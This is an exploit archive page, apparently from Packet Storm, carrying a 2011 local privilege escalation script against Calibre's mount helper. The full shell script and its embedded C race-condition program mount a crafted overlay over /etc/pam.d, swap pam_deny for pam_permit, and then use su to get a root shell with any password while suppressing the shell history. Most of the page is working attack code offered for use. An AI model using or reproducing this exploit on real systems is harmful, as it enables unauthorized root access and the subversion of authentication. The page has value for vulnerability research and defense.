exploit the possibilities

Calibre E-Book Reader Local Root Race Condition

Calibre E-Book Reader Local Root Race Condition
Posted Nov 3, 2011
Authored by Dan Rosenberg, zx2c4

Calibre E-Book Reader local root race condition exploit that subverts recent changes preventing symlinks and checking path prefixes.

tags | exploit, local, root
MD5 | d7de7d66784b296235b391ff4165a7ca

Calibre E-Book Reader Local Root Race Condition

Change Mirror Download
#!/bin/sh

###########################################
# .70-Calibrer Assault Mount #
# by Dan Rosenberg (@djrbliss) and zx2c4 #
###########################################

################################################################################
# Yesterday we learned how Calibre's ability to mount anything anywhere resulted
# in a local root. Today's exploit shows a race condition to subvert recent
# changes preventing symlinks and checking path prefixes.
#
# - djrbliss & zx2c4
# 2011-11-3
################################################################################


overlay=/dev/shm/overlay
staging=/media/staging
mounter=calibre-mount-helper
fakemount=/media/staging/fake
target=/etc/pam.d
mkfsntfs=/sbin/mkfs.ntfs

echo "[+] Making overlay image:"
dd if=/dev/zero of=$overlay count=51200
$mkfsntfs -F $overlay

echo "[+] Mounting overlay image using calibre-mount-helper."
$mounter mount $overlay $staging

echo "[+] Copying /etc/pam.d/ into overlay."
cp /etc/pam.d/* $staging/ 2>/dev/null

sed -i "s/pam_deny.so/pam_permit.so/g" $staging/common-auth

echo "[*] Making fake mountpoint."
rm -rf $fakemount 2>/dev/null

echo "[*] Preparing binary payload..."

cat > /tmp/pwn.c << _EOF
#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char **argv)
{

int fd, wd, ret;

if (fork()) {
fd = inotify_init();

unlink("$fakemount");
mkdir("$fakemount");

wd = inotify_add_watch(fd, "$fakemount", IN_CREATE);
read(fd, 0, 0);

rename("$fakemount", "$staging/tmp");
symlink("$target", "$fakemount");
rmdir("$staging/tmp");

return 0;

} else {
sleep(1);
return system("$mounter mount $overlay $fakemount");
}
return 0;
}
_EOF

gcc /tmp/pwn.c -o /tmp/pwn
ret=1
while [ $ret -ne 0 ]; do
/tmp/pwn
ret=$?
done;

sleep 2

echo "[+] Asking for root. When prompted for a password, type anything and press enter."
su -c "echo \"[+] Cleaning up.\"; umount $fakemount; umount $staging; rm -rf $overlay; echo \"[+] Getting shell.\"; HISTFILE=\"/dev/null\" exec /bin/sh"

Login or Register to add favorites

File Archive:

October 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    16 Files
  • 2
    Oct 2nd
    1 Files
  • 3
    Oct 3rd
    1 Files
  • 4
    Oct 4th
    24 Files
  • 5
    Oct 5th
    24 Files
  • 6
    Oct 6th
    11 Files
  • 7
    Oct 7th
    14 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    1 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    7 Files
  • 12
    Oct 12th
    15 Files
  • 13
    Oct 13th
    26 Files
  • 14
    Oct 14th
    10 Files
  • 15
    Oct 15th
    6 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close